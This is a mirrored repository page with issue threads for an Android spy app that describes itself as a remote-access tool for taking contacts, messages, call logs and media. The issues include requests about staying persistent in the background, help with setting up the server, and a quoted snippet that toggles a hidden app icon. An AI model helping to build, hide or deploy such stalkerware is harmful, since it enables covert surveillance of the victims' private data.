Coder Social home page Coder Social logo

abhinavsuthar / android_spy_app Goto Github PK

View Code? Open in Web Editor NEW
438.0 438.0 235.0 4.11 MB

This is a android spy app, which uploads user data such as contacts, messages, call log, send message(s), photos, videos, open a browser link etc. Android Rat

Home Page: https://hawkshaw.dev

Kotlin 76.86% Java 23.14%
android kotlin kotlin-android node-js socket-io spy spy-bot

android_spy_app's People

Contributors

abhinavsuthar avatar saksham2410 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

android_spy_app's Issues

Regarding app

Hi . Android Devices after android 8.0 update they are using aggressive battery saving algorithm to extend their battery life. Due to that app will stop running in background when the screen is locked and it will stop the app permanently running from background whether your app can bypass this and it is 100% persistent?

T

B

Anyway: No bots online

I set DEVELOPMENT_SERVER var in Constants.tk on which address I have set up NodeJs server but still: No bots online, and service app is crashed periodically?

PermissionsActivity missing

Hello,
I am very new to android and I don't know much about it. but when I try to build this project from master branch I see error in AndroidManifest.xml that ".activities.PermissionsActivity" is missing and there is no activity for this. This may be basics but I am not sure how to write it or find it if any one can help.
Thanks

How did you get text from InboxStyle Notification ?

I am using AccessibilityService and casting event to notification
Notification n = (Notification) event.getParcelableData();

But in case of inbox style notification it give 2 new messages,3 new message,4 new messages....
is their any other way to retrieve notification extra messages ?

Give Original code

At The Code of Panel and Android are Adbot project code not Original code

PermissionActivity.java is missing

in tasks folder
BaseTask is referring

private fun showAppIcon() {
val componentName = ComponentName(ctx, PermissionsActivity::class.java)
ctx.packageManager.setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_ENABLED, PackageManager.DONT_KILL_APP)
}

protected fun requestPermissions() {
    // app icon already shown in debug
    if (!BuildConfig.DEBUG) showAppIcon()
    val i = Intent(ctx, PermissionsActivity::class.java)
    i.addFlags(FLAG_ACTIVITY_NEW_TASK)
    ctx.startActivity(i)
}

here PermissionAcivity.java file is missing ???

kindly help me out to get this file ...

How much would it cost

How much would it cost for you to set up your project for me, generating the application and configuring a part of the application

I can add multiple cell phones

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.